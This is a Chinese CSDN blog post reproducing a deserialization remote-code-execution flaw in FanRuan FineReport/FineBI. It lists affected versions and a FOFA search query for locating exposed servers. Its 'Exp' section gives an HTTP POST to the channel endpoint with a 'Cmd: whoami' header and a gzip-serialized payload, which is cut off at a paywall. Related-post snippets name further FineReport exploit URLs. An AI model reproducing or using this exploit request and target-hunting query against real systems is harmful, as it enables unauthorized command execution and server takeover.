帆软报表 channel 反序列化漏洞复现

于 2023-11-27 18:56:15 发布
阅读量3.3k 收藏 11
点赞数 10
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134652054
版权

0x01 产品简介

 FineReport、FineBI 是帆软软件开发的企业级报表设计和数据分析工具与商业智能平台。

0x02 漏洞概述

 帆软FineReport、FineBI 存在反序列化漏洞,攻击者可向 /webroot/decision/remote/design/channel 接口发送精心构造的反序列化数据,在目标服务器上执行任意代码,获取服务器权限。

0x03 影响范围

FineBI  <= V5.1.10

0x04 复现环境

FOFA:app="帆软-FineReport"

0x05 漏洞复现

Exp

POST /webroot/decision/remote/design/channel HTTP/1.1
Host: your-ip
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 17531

{
  {unquote("\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x9cz\x09|T\xd5\xf5\xff\xf7\xbcY\xde\x9b\xc9\xcb6!\x09\x83\x88\x01Y\xb3\x0d\xb2\xa9\x13eIX\x0c$\x01\x0d\x05C\xb4\xf82\xf3\x92\x0c\xcc\xb
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
订阅专栏
帆软 FineReport/FineBI channel反序列化漏洞分析
errorr0
07-18 1万+
漏洞分析
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
被攻击的一些重点系统漏洞整理
鱼的博客
08-18 1254
一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co
帆软报表 2012 信息泄露漏洞导致RCE
孤桜懶契
04-25 4928
漏洞描述 i ⭐帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息 漏洞影响 s ✅帆软报表 2012 空间测绘 d ⭕FOFA:body="down.download?FM_SYS_ID" 漏洞复现 访问ip日志EXP http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false ✅ 数据库信息泄露 http://xxx.xxx
帆软 FineReport之channel反序列化漏洞复现的简单记录(不含EXP)
lostnerv的专栏
08-25 3170
FineReport 的包和BI不一样,无法原样照搬,最后还是自己找到了个利用链,可以实现任意文件上传,不知道有没有可以直接RCE的大佬,可以传授我下~~。
反序列化漏洞
F2444790591的博客
07-31 1895
反序列化漏洞
帆软报表漏洞总结
weixin_51345872的博客
09-05 8195
仅供学习参考使用,任何违法事情与本人无关
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
帆软报表 V8 get_geo_json 任意文件读取漏洞
huangyongkang666的博客
01-25 5740
帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
Java反序列化漏洞介绍书籍
08-17
专业介绍Java反序列化漏洞知识,攻防技术
FineReport(帆软)报表系统目录遍历漏洞复现和用简易过滤器处理
qq_34078582的博客
12-28 1万+
1.复现: 1.1直接通过浏览器访问以下地址 http://localhost:8080/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true ...
帆软 目录可浏览漏洞
laughingsister的博客
05-13 2310
因为帆软有内置服务器,一般运行都是内置服务器下运行的。可以里面的文件夹可以浏览,一定程度上造成安全问题。 整改建议 部署在Tomcat下,可以避免这个问题。
帆软 V9 Getshell 漏洞
swordheart的博客
07-08 5357
0x00 任意文件上传漏洞【FineReport V9】0x01 漏洞描述此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动帆软后默认存在的 JSP 文件0x02 漏洞详情 payload 替换成冰蝎的马,即可getshell0x03 临时修复建议排查是否使用帆软系统,并同步在AF自定义禁止访问webroot/ReportServer路径。...
帆软(FineReport) V9任意文件覆盖漏洞
江左盟的博客
05-03 2万+
目录 漏洞简介 影响范围 漏洞分析 漏洞利用 修复方法 批量漏洞检测工具 漏洞简介 该漏洞是在近期HVV中被披露的,由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限。 影响范围 WebReport V9 漏洞分析 fr-chart-9.0.jar包中com.fr.chart.web/ChartSvgInitService类传递op参数的值svginit: 漏洞主要出现在fr-chart-9.0.
帆软报表channel反序列化漏洞
最新发布
12-09
帆软报表是一款企业级报表设计、生成和发布软件。它提供了丰富的数据展现和统计分析功能,广泛应用于各个行业的数据报表处理中。 而帆软报表channel反序列化漏洞是指在使用帆软报表软件时,由于未对用户输入的渠道配置信息进行正确的反序列化验证,导致恶意攻击者可以构造恶意渠道配置数据,以此来获取或篡改系统中的敏感信息,或者执行一些危害系统安全的操作。 该漏洞的原因主要是由于帆软报表软件在处理渠道配置信息时,没有对用户输入的数据进行充分的验证和过滤。攻击者可以通过构造恶意的渠道配置文件,包含恶意代码或者可以触发一些未被预料到的漏洞行为,从而获取系统权限或者进行其他恶意操作。 要解决这个漏洞问题,首先需要帆软报表软件方面加强对用户输入的渠道配置信息的验证和过滤。包括对输入数据进行严格的反序列化限制,验证渠道配置文件的合法性和完整性,确保渠道配置文件中不存在恶意代码或者其他危险操作。 同时,用户在使用帆软报表软件时也应当注意保持软件及时更新,避免使用非官方渠道配置文件,以及加强系统的安全管理,限制不必要的系统权限,提高系统的安全性。 总之,帆软报表channel反序列化漏洞是一种安全风险,需要软件提供商和用户共同努力来进行修复和加强防护措施,以保障系统数据的安全性和完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值